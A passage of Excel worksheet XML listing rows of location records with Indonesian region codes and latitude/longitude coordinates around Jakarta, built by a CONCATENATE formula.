        <v>621</v>
      </c>
      <c r="R1719" t="s">
        <v>84</v>
      </c>
      <c r="S1719" t="s">
        <v>32</v>
      </c>
      <c r="T1719" t="s">
        <v>33</v>
      </c>
      <c r="U1719" s="5">
        <v>10674619</v>
      </c>
      <c r="V1719" s="5" t="s">
        <v>16008</v>
      </c>
      <c r="W1719" s="5">
        <v>-616129</v>
      </c>
      <c r="X1719" t="s">
        <v>19396</v>
      </c>
      <c r="Y1719" t="str">
        <f t="shared" si="26"/>
        <v>-6.16129,106.74619</v>
      </c>
    </row>
    <row r="1720" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1720">
        <v>109246</v>
      </c>
      <c r="B1720" s="1">
        <v>43886</v>
      </c>
      <c r="C1720">
        <v>0</v>
      </c>
      <c r="D1720" t="s">
        <v>22</v>
      </c>
      <c r="E1720" t="s">
        <v>23</v>
      </c>
      <c r="F1720" t="s">
        <v>5895</v>
      </c>
      <c r="H1720" t="s">
        <v>26</v>
      </c>
      <c r="I1720" t="s">
        <v>523</v>
      </c>
      <c r="J1720" t="s">
        <v>4755</v>
      </c>
      <c r="L1720" t="s">
        <v>5896</v>
      </c>
      <c r="M1720">
        <v>3175020003</v>
      </c>
      <c r="N1720">
        <v>3175020</v>
      </c>
      <c r="O1720">
        <v>3175</v>
      </c>
      <c r="P1720">
        <v>31</v>
      </c>
      <c r="Q1720" t="s">
        <v>2667</v>
      </c>
      <c r="R1720" t="s">
        <v>2228</v>
      </c>
      <c r="S1720" t="s">
        <v>547</v>
      </c>
      <c r="T1720" t="s">
        <v>33</v>
      </c>
      <c r="U1720" s="5">
        <v>10681267</v>
      </c>
      <c r="V1720" s="5" t="s">
        <v>16009</v>
      </c>
      <c r="W1720" s="5">
        <v>-612313</v>
      </c>
      <c r="X1720" t="s">
        <v>19773</v>
      </c>
      <c r="Y1720" t="str">
        <f t="shared" si="26"/>
        <v>-6.12313,106.81267</v>
      </c>
    </row>
    <row r="1721" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1721">
        <v>109247</v>
      </c>
      <c r="B1721" s="1">
        <v>43886</v>
      </c>
      <c r="C1721">
        <v>0</v>
      </c>
      <c r="D1721" t="s">
        <v>22</v>
      </c>
      <c r="E1721" t="s">
        <v>23</v>
      </c>
      <c r="F1721" t="s">
        <v>5897</v>
      </c>
      <c r="G1721" t="s">
        <v>5898</v>
      </c>
      <c r="H1721" t="s">
        <v>26</v>
      </c>
      <c r="I1721" t="s">
        <v>492</v>
      </c>
      <c r="J1721" t="s">
        <v>5899</v>
      </c>
      <c r="M1721">
        <v>3171030005</v>
      </c>
      <c r="N1721">
        <v>3171030</v>
      </c>
      <c r="O1721">
        <v>3171</v>
      </c>
      <c r="P1721">
        <v>31</v>
      </c>
      <c r="Q1721" t="s">
        <v>5900</v>
      </c>
      <c r="R1721" t="s">
        <v>364</v>
      </c>
      <c r="S1721" t="s">
        <v>108</v>
      </c>
      <c r="T1721" t="s">
        <v>33</v>
      </c>
      <c r="U1721" s="5">
        <v>10681304</v>
      </c>
      <c r="V1721" s="5" t="s">
        <v>16010</v>
      </c>
      <c r="W1721" s="5">
        <v>-627273</v>
      </c>
      <c r="X1721" t="s">
        <v>19774</v>
      </c>
      <c r="Y1721" t="str">
        <f t="shared" si="26"/>
        <v>-6.27273,106.81304</v>
      </c>
    </row>
    <row r="1722" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1722">
        <v>109248</v>
      </c>
      <c r="B1722" s="1">
        <v>43886</v>
      </c>
      <c r="C1722">
        <v>0</v>
      </c>
      <c r="D1722" t="s">
        <v>22</v>
      </c>
      <c r="E1722" t="s">
        <v>23</v>
      </c>
      <c r="F1722" t="s">
        <v>5901</v>
      </c>
      <c r="G1722" t="s">
        <v>5902</v>
      </c>
      <c r="H1722" t="s">
        <v>26</v>
      </c>
      <c r="I1722" t="s">
        <v>5903</v>
      </c>
      <c r="J1722" t="s">
        <v>4906</v>
      </c>
      <c r="L1722" t="s">
        <v>5904</v>
      </c>
      <c r="M1722">
        <v>3173010002</v>
      </c>
      <c r="N1722">
        <v>3173010</v>
      </c>
      <c r="O1722">
        <v>3173</v>
      </c>
      <c r="P1722">
        <v>31</v>
      </c>
      <c r="Q1722" t="s">
        <v>4908</v>
      </c>
      <c r="R1722" t="s">
        <v>1481</v>
      </c>
      <c r="S1722" t="s">
        <v>62</v>
      </c>
      <c r="T1722" t="s">
        <v>33</v>
      </c>
      <c r="U1722" s="5">
        <v>10681230</v>
      </c>
      <c r="V1722" s="5" t="s">
        <v>16011</v>
      </c>
      <c r="W1722" s="5">
        <v>-621249</v>
      </c>
      <c r="X1722" t="s">
        <v>19775</v>
      </c>
      <c r="Y1722" t="str">
        <f t="shared" si="26"/>
        <v>-6.21249,106.81230</v>
      </c>
    </row>
    <row r="1723" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1723">
        <v>109249</v>
      </c>
      <c r="B1723" s="1">
        <v>43886</v>
      </c>
      <c r="C1723">
        <v>0</v>
      </c>
      <c r="D1723" t="s">
        <v>22</v>
      </c>
      <c r="E1723" t="s">
        <v>23</v>
      </c>
      <c r="F1723" t="s">
        <v>5905</v>
      </c>
      <c r="G1723" t="s">
        <v>5906</v>
      </c>
      <c r="H1723" t="s">
        <v>26</v>
      </c>
      <c r="I1723" t="s">
        <v>945</v>
      </c>
      <c r="J1723" t="s">
        <v>4816</v>
      </c>
      <c r="L1723" t="s">
        <v>5907</v>
      </c>
      <c r="M1723">
        <v>3174060005</v>
      </c>
      <c r="N1723">
        <v>3174060</v>
      </c>
      <c r="O1723">
        <v>3174</v>
      </c>
      <c r="P1723">
        <v>31</v>
      </c>
      <c r="Q1723" t="s">
        <v>4818</v>
      </c>
      <c r="R1723" t="s">
        <v>1762</v>
      </c>
      <c r="S1723" t="s">
        <v>32</v>
      </c>
      <c r="T1723" t="s">
        <v>33</v>
      </c>
      <c r="U1723" s="5">
        <v>10681904</v>
      </c>
      <c r="V1723" s="5" t="s">
        <v>16012</v>
      </c>
      <c r="W1723" s="5">
        <v>-614089</v>
      </c>
      <c r="X1723" t="s">
        <v>19776</v>
      </c>
      <c r="Y1723" t="str">
        <f t="shared" si="26"/>
        <v>-6.14089,106.81904</v>
      </c>
    </row>
    <row r="1724" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1724">
        <v>109250</v>
      </c>
      <c r="B1724" s="1">
        <v>43886</v>
      </c>
      <c r="C1724">
        <v>0</v>
      </c>
      <c r="D1724" t="s">
        <v>22</v>
      </c>
      <c r="E1724" t="s">
        <v>23</v>
      </c>
      <c r="F1724" t="s">
        <v>5908</v>
      </c>
      <c r="H1724" t="s">
        <v>26</v>
      </c>
      <c r="I1724" t="s">
        <v>1651</v>
      </c>
      <c r="J1724" t="s">
        <v>5884</v>
      </c>
      <c r="L1724" t="s">
        <v>5909</v>
      </c>
      <c r="M1724">
        <v>3174060002</v>
      </c>
      <c r="N1724">
        <v>3174060</v>
      </c>
      <c r="O1724">
        <v>3174</v>
      </c>
      <c r="P1724">
        <v>31</v>
      </c>
      <c r="Q1724" t="s">
        <v>1761</v>
      </c>
      <c r="R1724" t="s">
        <v>1762</v>
      </c>
      <c r="S1724" t="s">
        <v>32</v>
      </c>
      <c r="T1724" t="s">
        <v>33</v>
      </c>
      <c r="U1724" s="5">
        <v>10682669</v>
      </c>
      <c r="V1724" s="5" t="s">
        <v>16013</v>
      </c>
      <c r="W1724" s="5">
        <v>-615982</v>
      </c>
      <c r="X1724" t="s">
        <v>19777</v>
      </c>
      <c r="Y1724" t="str">
        <f t="shared" si="26"/>
        <v>-6.15982,106.82669</v>
      </c>
    </row>
    <row r="1725" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1725">
        <v>109251</v>
      </c>
      <c r="B1725" s="1">
        <v>43886</v>
      </c>
      <c r="C1725">
        <v>0</v>
      </c>
      <c r="D1725" t="s">
        <v>22</v>
      </c>
      <c r="E1725" t="s">
        <v>23</v>
      </c>
      <c r="F1725" t="s">
        <v>5910</v>
      </c>
      <c r="G1725" t="s">
        <v>5911</v>
      </c>
      <c r="H1725" t="s">
        <v>26</v>
      </c>
      <c r="I1725" t="s">
        <v>166</v>
      </c>
      <c r="J1725" t="s">
        <v>2627</v>
      </c>
      <c r="L1725" t="s">
        <v>5912</v>
      </c>
      <c r="M1725">
        <v>3275040006</v>
      </c>
      <c r="N1725">
        <v>3275040</v>
      </c>
      <c r="O1725">
        <v>3275</v>
      </c>
      <c r="P1725">
        <v>32</v>
      </c>
      <c r="Q1725" t="s">
        <v>2185</v>
      </c>
      <c r="R1725" t="s">
        <v>100</v>
      </c>
      <c r="S1725" t="s">
        <v>41</v>
      </c>
      <c r="T1725" t="s">
        <v>42</v>
      </c>
      <c r="U1725" s="5">
        <v>10701040</v>
      </c>
      <c r="V1725" s="5" t="s">
        <v>16014</v>
      </c>
      <c r="W1725" s="5">
        <v>-624188</v>
      </c>
      <c r="X1725" t="s">
        <v>19778</v>
      </c>
      <c r="Y1725" t="str">
        <f t="shared" si="26"/>
        <v>-6.24188,107.01040</v>
      </c>
    </row>
    <row r="1726" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1726">
        <v>109252</v>
      </c>
      <c r="B1726" s="1">
        <v>43886</v>
      </c>
      <c r="C1726">
        <v>0</v>
      </c>
      <c r="D1726" t="s">
        <v>22</v>
      </c>
      <c r="E1726" t="s">
        <v>23</v>
      </c>
      <c r="F1726" t="s">
        <v>5913</v>
      </c>
      <c r="G1726" t="s">
        <v>5914</v>
      </c>
      <c r="H1726" t="s">
        <v>26</v>
      </c>
      <c r="I1726" t="s">
        <v>666</v>
      </c>
      <c r="J1726" t="s">
        <v>2305</v>
      </c>
      <c r="L1726" t="s">
        <v>5915</v>
      </c>
      <c r="M1726">
        <v>3172080007</v>
      </c>
      <c r="N1726">
        <v>3172080</v>
      </c>
      <c r="O1726">
        <v>3172</v>
      </c>
      <c r="P1726">
        <v>31</v>
      </c>
      <c r="Q1726" t="s">
        <v>2307</v>
      </c>
      <c r="R1726" t="s">
        <v>141</v>
      </c>
      <c r="S1726" t="s">
        <v>49</v>
      </c>
      <c r="T1726" t="s">
        <v>33</v>
      </c>
      <c r="U1726" s="5">
        <v>10692305</v>
      </c>
      <c r="V1726" s="5" t="s">
        <v>16015</v>
      </c>
      <c r="W1726" s="5">
        <v>-617512</v>
      </c>
      <c r="X1726" t="s">
        <v>19779</v>
      </c>
      <c r="Y1726" t="str">
        <f t="shared" si="26"/>
        <v>-6.17512,106.92305</v>
      </c>
    </row>
    <row r="1727" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1727">
        <v>109253</v>
      </c>
      <c r="B1727" s="1">
        <v>43886</v>
      </c>
      <c r="C1727">
        <v>0</v>
      </c>
      <c r="D1727" t="s">
        <v>22</v>
      </c>
      <c r="E1727" t="s">
        <v>23</v>
      </c>
      <c r="F1727" t="s">
        <v>5916</v>
      </c>
      <c r="G1727" t="s">
        <v>5917</v>
      </c>
      <c r="H1727" t="s">
        <v>26</v>
      </c>
      <c r="I1727" t="s">
        <v>193</v>
      </c>
      <c r="J1727" t="s">
        <v>2627</v>
      </c>
      <c r="L1727" t="s">
        <v>5918</v>
      </c>
      <c r="M1727">
        <v>3273180006</v>
      </c>
      <c r="N1727">
        <v>3273180</v>
      </c>
      <c r="O1727">
        <v>3273</v>
      </c>
      <c r="P1727">
        <v>32</v>
      </c>
      <c r="Q1727" t="s">
        <v>31</v>
      </c>
      <c r="R1727" t="s">
        <v>1731</v>
      </c>
      <c r="S1727" t="s">
        <v>1464</v>
      </c>
      <c r="T1727" t="s">
        <v>42</v>
      </c>
      <c r="U1727" s="5">
        <v>10760302</v>
      </c>
      <c r="V1727" s="5" t="s">
        <v>15673</v>
      </c>
      <c r="W1727" s="5">
        <v>-691984</v>
      </c>
      <c r="X1727" t="s">
        <v>19450</v>
      </c>
      <c r="Y1727" t="str">
        <f t="shared" si="26"/>
        <v>-6.91984,107.60302</v>
      </c>
    </row>
    <row r="1728" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1728">
        <v>109254</v>
      </c>
      <c r="B1728" s="1">
        <v>43886</v>
      </c>
      <c r="C1728">
        <v>0</v>
      </c>
      <c r="D1728" t="s">
        <v>22</v>
      </c>
      <c r="E1728" t="s">
        <v>23</v>
      </c>
      <c r="F1728" t="s">
        <v>5919</v>
      </c>
      <c r="H1728" t="s">
        <v>26</v>
      </c>
      <c r="I1728" t="s">
        <v>628</v>
      </c>
      <c r="J1728" t="s">
        <v>3177</v>
      </c>
      <c r="L1728" t="s">
        <v>5920</v>
      </c>
      <c r="M1728">
        <v>3175050002</v>
      </c>
      <c r="N1728">
        <v>3175050</v>
      </c>
      <c r="O1728">
        <v>3175</v>
      </c>
      <c r="P1728">
        <v>31</v>
      </c>
      <c r="Q1728" t="s">
        <v>1012</v>
      </c>
      <c r="R1728" t="s">
        <v>1013</v>
      </c>
      <c r="S1728" t="s">
        <v>547</v>
      </c>
      <c r="T1728" t="s">
        <v>33</v>
      </c>
      <c r="U1728" s="5">
        <v>10690650</v>
      </c>
      <c r="V1728" s="5" t="s">
        <v>15810</v>
      </c>
      <c r="W1728" s="5">
        <v>-616469</v>
      </c>
      <c r="X1728" t="s">
        <v>19780</v>
      </c>
      <c r="Y1728" t="str">
        <f t="shared" si="26"/>
        <v>-6.16469,106.90650</v>
      </c>
    </row>
    <row r="1729" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1729">
        <v>109255</v>
      </c>
      <c r="B1729" s="1">
        <v>43886</v>
      </c>
      <c r="C1729">
        <v>0</v>
      </c>
      <c r="D1729" t="s">
        <v>22</v>
      </c>
      <c r="E1729" t="s">
        <v>23</v>
      </c>
      <c r="F1729" t="s">
        <v>5921</v>
      </c>
      <c r="G1729" t="s">
        <v>5922</v>
      </c>
      <c r="H1729" t="s">
        <v>26</v>
      </c>
      <c r="I1729" t="s">
        <v>1891</v>
      </c>
      <c r="J1729" t="s">
        <v>5923</v>
      </c>
      <c r="L1729" t="s">
        <v>5924</v>
      </c>
      <c r="M1729">
        <v>3172030008</v>
      </c>
      <c r="N1729">
        <v>3172030</v>
      </c>
      <c r="O1729">
        <v>3172</v>
      </c>
      <c r="P1729">
        <v>31</v>
      </c>
      <c r="Q1729" t="s">
        <v>5602</v>
      </c>
      <c r="R1729" t="s">
        <v>228</v>
      </c>
      <c r="S1729" t="s">
        <v>49</v>
      </c>
      <c r="T1729" t="s">
        <v>33</v>
      </c>
      <c r="U1729" s="5">
        <v>10690277</v>
      </c>
      <c r="V1729" s="5" t="s">
        <v>16016</v>
      </c>
      <c r="W1729" s="5">
        <v>-629271</v>
      </c>
      <c r="X1729" t="s">
        <v>19781</v>
      </c>
      <c r="Y1729" t="str">
        <f t="shared" si="26"/>
        <v>-6.29271,106.90277</v>
      </c>
    </row>
    <row r="1730" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1730">
        <v>109256</v>
      </c>
      <c r="B1730" s="1">
        <v>43886</v>
      </c>
      <c r="C1730">
        <v>0</v>
      </c>
      <c r="D1730" t="s">
        <v>22</v>
      </c>
      <c r="E1730" t="s">
        <v>23</v>
      </c>
      <c r="F1730" t="s">
        <v>5925</v>
      </c>
      <c r="H1730" t="s">
        <v>26</v>
      </c>
      <c r="I1730" t="s">
        <v>1758</v>
      </c>
      <c r="J1730" t="s">
        <v>1010</v>
      </c>
      <c r="L1730" t="s">
        <v>5926</v>
      </c>
      <c r="M1730">
        <v>3175050002</v>
      </c>
      <c r="N1730">
        <v>3175050</v>
      </c>
      <c r="O1730">
        <v>3175</v>
      </c>
      <c r="P1730">
        <v>31</v>
      </c>
      <c r="Q1730" t="s">
        <v>1012</v>
      </c>
      <c r="R1730" t="s">
        <v>1013</v>
      </c>
      <c r="S1730" t="s">
        <v>547</v>
      </c>
      <c r="T1730" t="s">
        <v>33</v>
      </c>
      <c r="U1730" s="5">
        <v>10690388</v>
      </c>
      <c r="V1730" s="5" t="s">
        <v>16017</v>
      </c>
      <c r="W1730" s="5">
        <v>-616954</v>
      </c>
      <c r="X1730" t="s">
        <v>19782</v>
      </c>
      <c r="Y1730" t="str">
        <f t="shared" si="26"/>
        <v>-6.16954,106.90388</v>
      </c>
    </row>
    <row r="1731" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1731">
        <v>109257</v>
      </c>
      <c r="B1731" s="1">
        <v>43886</v>
      </c>
      <c r="C1731">
        <v>0</v>
      </c>
      <c r="D1731" t="s">
        <v>22</v>
      </c>
      <c r="E1731" t="s">
        <v>23</v>
      </c>
      <c r="F1731" t="s">
        <v>5927</v>
      </c>
      <c r="G1731" t="s">
        <v>5928</v>
      </c>
      <c r="H1731" t="s">
        <v>26</v>
      </c>
      <c r="I1731" t="s">
        <v>878</v>
      </c>
      <c r="J1731" t="s">
        <v>2627</v>
      </c>
      <c r="L1731" t="s">
        <v>5929</v>
      </c>
      <c r="M1731">
        <v>3216081001</v>
      </c>
      <c r="N1731">
        <v>3216081</v>
      </c>
      <c r="O1731">
        <v>3216</v>
      </c>
      <c r="P1731">
        <v>32</v>
      </c>
      <c r="Q1731" t="s">
        <v>1726</v>
      </c>
      <c r="R1731" t="s">
        <v>2512</v>
      </c>
      <c r="S1731" t="s">
        <v>41</v>
      </c>
      <c r="T1731" t="s">
        <v>42</v>
      </c>
      <c r="U1731" s="5">
        <v>10701759</v>
      </c>
      <c r="V1731" s="5" t="s">
        <v>15615</v>
      </c>
      <c r="W1731" s="5">
        <v>-627079</v>
      </c>
      <c r="X1731" t="s">
        <v>19783</v>
      </c>
      <c r="Y1731" t="str">
        <f t="shared" ref="Y1731:Y1794" si="27">CONCATENATE(X1731,",",V1731)</f>
        <v>-6.27079,107.01759</v>
      </c>
    </row>
    <row r="1732" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1732">
        <v>109258</v>
      </c>
      <c r="B1732" s="1">
        <v>43886</v>
      </c>
      <c r="C1732">
        <v>0</v>
      </c>
      <c r="D1732" t="s">
        <v>85</v>
      </c>
      <c r="E1732" t="s">
        <v>23</v>
      </c>
      <c r="F1732" t="s">
        <v>5930</v>
      </c>
      <c r="G1732" t="s">
        <v>5931</v>
      </c>
      <c r="H1732" t="s">
        <v>26</v>
      </c>
      <c r="J1732" t="s">
        <v>2627</v>
      </c>
      <c r="K1732" t="s">
        <v>5932</v>
      </c>
      <c r="L1732" t="s">
        <v>5933</v>
      </c>
      <c r="M1732">
        <v>3275061004</v>
      </c>
      <c r="N1732">
        <v>3275061</v>
      </c>
      <c r="O1732">
        <v>3275</v>
      </c>
      <c r="P1732">
        <v>32</v>
      </c>
      <c r="Q1732" t="s">
        <v>39</v>
      </c>
      <c r="R1732" t="s">
        <v>40</v>
      </c>
      <c r="S1732" t="s">
        <v>41</v>
      </c>
      <c r="T1732" t="s">
        <v>42</v>
      </c>
      <c r="U1732" s="5">
        <v>10698412</v>
      </c>
      <c r="V1732" s="5" t="s">
        <v>16018</v>
      </c>
      <c r="W1732" s="5">
        <v>-618579</v>
      </c>
      <c r="X1732" t="s">
        <v>19784</v>
      </c>
      <c r="Y1732" t="str">
        <f t="shared" si="27"/>
        <v>-6.18579,106.98412</v>
      </c>
    </row>
    <row r="1733" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1733">
        <v>109259</v>
      </c>
      <c r="B1733" s="1">
        <v>43886</v>
      </c>
      <c r="C1733">
        <v>0</v>
      </c>
      <c r="D1733" t="s">
        <v>22</v>
      </c>
      <c r="E1733" t="s">
        <v>23</v>
      </c>
      <c r="F1733" t="s">
        <v>5934</v>
      </c>
      <c r="G1733" t="s">
        <v>5935</v>
      </c>
      <c r="H1733" t="s">
        <v>26</v>
      </c>
      <c r="I1733" t="s">
        <v>753</v>
      </c>
      <c r="J1733" t="s">
        <v>5936</v>
      </c>
      <c r="L1733" t="s">
        <v>5937</v>
      </c>
      <c r="M1733">
        <v>3174030003</v>
      </c>
      <c r="N1733">
        <v>3174030</v>
      </c>
      <c r="O1733">
        <v>3174</v>
      </c>
      <c r="P1733">
        <v>31</v>
      </c>
      <c r="Q1733" t="s">
        <v>1486</v>
      </c>
      <c r="R1733" t="s">
        <v>1487</v>
      </c>
      <c r="S1733" t="s">
        <v>32</v>
      </c>
      <c r="T1733" t="s">
        <v>33</v>
      </c>
      <c r="U1733" s="5">
        <v>10678415</v>
      </c>
      <c r="V1733" s="5" t="s">
        <v>16019</v>
      </c>
      <c r="W1733" s="5">
        <v>-618585</v>
      </c>
      <c r="X1733" t="s">
        <v>18963</v>
      </c>
      <c r="Y1733" t="str">
        <f t="shared" si="27"/>
        <v>-6.18585,106.78415</v>
      </c>
    </row>
    <row r="1734" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1734">
        <v>109260</v>
      </c>
      <c r="B1734" s="1">
        <v>43886</v>
      </c>
      <c r="C1734">
        <v>0</v>
      </c>
      <c r="D1734" t="s">
        <v>22</v>
      </c>
      <c r="E1734" t="s">
        <v>23</v>
      </c>
      <c r="F1734" t="s">
        <v>5938</v>
      </c>
      <c r="G1734" t="s">
        <v>5939</v>
      </c>
      <c r="H1734" t="s">
        <v>26</v>
      </c>
      <c r="I1734" t="s">
        <v>1689</v>
      </c>
      <c r="J1734" t="s">
        <v>3135</v>
      </c>
      <c r="L1734" t="s">
        <v>5940</v>
      </c>
      <c r="M1734">
        <v>3674060003</v>
      </c>
      <c r="N1734">
        <v>3674060</v>
      </c>
      <c r="O1734">
        <v>3674</v>
      </c>
      <c r="P1734">
        <v>36</v>
      </c>
      <c r="Q1734" t="s">
        <v>205</v>
      </c>
      <c r="R1734" t="s">
        <v>169</v>
      </c>
      <c r="S1734" t="s">
        <v>170</v>
      </c>
      <c r="T1734" t="s">
        <v>171</v>
      </c>
      <c r="U1734" s="5">
        <v>10669243</v>
      </c>
      <c r="V1734" s="5" t="s">
        <v>16020</v>
      </c>
      <c r="W1734" s="5">
        <v>-624888</v>
      </c>
      <c r="X1734" t="s">
        <v>19785</v>
      </c>
      <c r="Y1734" t="str">
        <f t="shared" si="27"/>
        <v>-6.24888,106.69243</v>
      </c>
    </row>
    <row r="1735" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1735">
        <v>109261</v>
      </c>
      <c r="B1735" s="1">
        <v>43886</v>
      </c>
      <c r="C1735">
        <v>0</v>
      </c>
      <c r="D1735" t="s">
        <v>22</v>
      </c>
      <c r="E1735" t="s">
        <v>23</v>
      </c>
      <c r="F1735" t="s">
        <v>5941</v>
      </c>
      <c r="G1735" t="s">
        <v>5942</v>
      </c>
      <c r="H1735" t="s">
        <v>26</v>
      </c>
      <c r="I1735" t="s">
        <v>76</v>
      </c>
      <c r="J1735" t="s">
        <v>1711</v>
      </c>
      <c r="L1735" t="s">
        <v>5943</v>
      </c>
      <c r="M1735">
        <v>3175050001</v>
      </c>
      <c r="N1735">
        <v>3175050</v>
      </c>
      <c r="O1735">
        <v>3175</v>
      </c>
      <c r="P1735">
        <v>31</v>
      </c>
      <c r="Q1735" t="s">
        <v>1037</v>
      </c>
      <c r="R1735" t="s">
        <v>1013</v>
      </c>
      <c r="S1735" t="s">
        <v>547</v>
      </c>
      <c r="T1735" t="s">
        <v>33</v>
      </c>
      <c r="U1735" s="5">
        <v>10690825</v>
      </c>
      <c r="V1735" s="5" t="s">
        <v>16021</v>
      </c>
      <c r="W1735" s="5">
        <v>-614597</v>
      </c>
      <c r="X1735" t="s">
        <v>19786</v>
      </c>
      <c r="Y1735" t="str">
        <f t="shared" si="27"/>
        <v>-6.14597,106.90825</v>
      </c>
    </row>
    <row r="1736" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1736">
        <v>109262</v>
      </c>
      <c r="B1736" s="1">
        <v>43886</v>
      </c>
      <c r="C1736">
        <v>0</v>
      </c>
      <c r="D1736" t="s">
        <v>22</v>
      </c>
      <c r="E1736" t="s">
        <v>23</v>
      </c>
      <c r="F1736" t="s">
        <v>5944</v>
      </c>
      <c r="G1736" t="s">
        <v>5945</v>
      </c>
      <c r="H1736" t="s">
        <v>26</v>
      </c>
      <c r="I1736" t="s">
        <v>65</v>
      </c>
      <c r="J1736" t="s">
        <v>2627</v>
      </c>
      <c r="L1736" t="s">
        <v>5946</v>
      </c>
      <c r="M1736">
        <v>3275050003</v>
      </c>
      <c r="N1736">
        <v>3275050</v>
      </c>
      <c r="O1736">
        <v>3275</v>
      </c>
      <c r="P1736">
        <v>32</v>
      </c>
      <c r="Q1736" t="s">
        <v>2310</v>
      </c>
      <c r="R1736" t="s">
        <v>955</v>
      </c>
      <c r="S1736" t="s">
        <v>41</v>
      </c>
      <c r="T1736" t="s">
        <v>42</v>
      </c>
      <c r="U1736" s="5">
        <v>10697460</v>
      </c>
      <c r="V1736" s="5" t="s">
        <v>16022</v>
      </c>
      <c r="W1736" s="5">
        <v>-625501</v>
      </c>
      <c r="X1736" t="s">
        <v>19787</v>
      </c>
      <c r="Y1736" t="str">
        <f t="shared" si="27"/>
        <v>-6.25501,106.97460</v>
      </c>
    </row>
    <row r="1737" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1737">
        <v>109263</v>
      </c>
      <c r="B1737" s="1">
        <v>43886</v>
      </c>
      <c r="C1737">
        <v>0</v>
      </c>
      <c r="D1737" t="s">
        <v>22</v>
      </c>
      <c r="E1737" t="s">
        <v>23</v>
      </c>
      <c r="F1737" t="s">
        <v>5947</v>
      </c>
      <c r="G1737" t="s">
        <v>5948</v>
      </c>
      <c r="H1737" t="s">
        <v>26</v>
      </c>
      <c r="I1737" t="s">
        <v>5949</v>
      </c>
      <c r="J1737" t="s">
        <v>374</v>
      </c>
      <c r="L1737" t="s">
        <v>5950</v>
      </c>
      <c r="M1737">
        <v>3174040005</v>
      </c>
      <c r="N1737">
        <v>3174040</v>
      </c>
      <c r="O1737">
        <v>3174</v>
      </c>
      <c r="P1737">
        <v>31</v>
      </c>
      <c r="Q1737" t="s">
        <v>376</v>
      </c>
      <c r="R1737" t="s">
        <v>377</v>
      </c>
      <c r="S1737" t="s">
        <v>32</v>
      </c>
      <c r="T1737" t="s">
        <v>33</v>
      </c>
      <c r="U1737" s="5">
        <v>10678910</v>
      </c>
      <c r="V1737" s="5" t="s">
        <v>16023</v>
      </c>
      <c r="W1737" s="5">
        <v>-616402</v>
      </c>
      <c r="X1737" t="s">
        <v>19788</v>
      </c>
      <c r="Y1737" t="str">
        <f t="shared" si="27"/>
        <v>-6.16402,106.78910</v>
      </c>
    </row>
    <row r="1738" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1738">
        <v>109264</v>
      </c>
      <c r="B1738" s="1">
        <v>43886</v>
      </c>
      <c r="C1738">
        <v>0</v>
      </c>
      <c r="D1738" t="s">
        <v>22</v>
      </c>
      <c r="E1738" t="s">
        <v>23</v>
      </c>
      <c r="F1738" t="s">
        <v>5951</v>
      </c>
      <c r="G1738" t="s">
        <v>5952</v>
      </c>
      <c r="H1738" t="s">
        <v>26</v>
      </c>
      <c r="I1738" t="s">
        <v>517</v>
      </c>
      <c r="J1738" t="s">
        <v>2627</v>
      </c>
      <c r="M1738">
        <v>3275012002</v>
      </c>
      <c r="N1738">
        <v>3275012</v>
      </c>
      <c r="O1738">
        <v>3275</v>
      </c>
      <c r="P1738">
        <v>32</v>
      </c>
      <c r="Q1738" t="s">
        <v>4208</v>
      </c>
      <c r="R1738" t="s">
        <v>4089</v>
      </c>
      <c r="S1738" t="s">
        <v>41</v>
      </c>
      <c r="T1738" t="s">
        <v>42</v>
      </c>
      <c r="U1738" s="5">
        <v>10694010</v>
      </c>
      <c r="V1738" s="5" t="s">
        <v>16024</v>
      </c>
      <c r="W1738" s="5">
        <v>-631458</v>
      </c>
      <c r="X1738" t="s">
        <v>19789</v>
      </c>
      <c r="Y1738" t="str">
        <f t="shared" si="27"/>
        <v>-6.31458,106.94010</v>
      </c>
    </row>
    <row r="1739" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1739">
        <v>109265</v>
      </c>
      <c r="B1739" s="1">
        <v>43886</v>
      </c>
      <c r="C1739">
        <v>0</v>
      </c>
      <c r="D1739" t="s">
        <v>22</v>
      </c>
      <c r="E1739" t="s">
        <v>23</v>
      </c>
      <c r="F1739" t="s">
        <v>5953</v>
      </c>
      <c r="G1739" t="s">
        <v>5954</v>
      </c>
      <c r="H1739" t="s">
        <v>26</v>
      </c>
      <c r="I1739" t="s">
        <v>5612</v>
      </c>
      <c r="J1739" t="s">
        <v>2627</v>
      </c>
      <c r="L1739" t="s">
        <v>5955</v>
      </c>
      <c r="M1739">
        <v>3216082005</v>
      </c>
      <c r="N1739">
        <v>3216082</v>
      </c>
      <c r="O1739">
        <v>3216</v>
      </c>
      <c r="P1739">
        <v>32</v>
      </c>
      <c r="Q1739" t="s">
        <v>985</v>
      </c>
      <c r="R1739" t="s">
        <v>601</v>
      </c>
      <c r="S1739" t="s">
        <v>41</v>
      </c>
      <c r="T1739" t="s">
        <v>42</v>
      </c>
      <c r="U1739" s="5">
        <v>10704535</v>
      </c>
      <c r="V1739" s="5" t="s">
        <v>16025</v>
      </c>
      <c r="W1739" s="5">
        <v>-618699</v>
      </c>
      <c r="X1739" t="s">
        <v>19790</v>
      </c>
      <c r="Y1739" t="str">
        <f t="shared" si="27"/>
        <v>-6.18699,107.04535</v>
      </c>
    </row>
    <row r="1740" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1740">
        <v>109266</v>
      </c>
      <c r="B1740" s="1">
        <v>43886</v>
      </c>
      <c r="C1740">
        <v>0</v>
      </c>
      <c r="D1740" t="s">
        <v>22</v>
      </c>
      <c r="E1740" t="s">
        <v>23</v>
      </c>
      <c r="F1740" t="s">
        <v>5956</v>
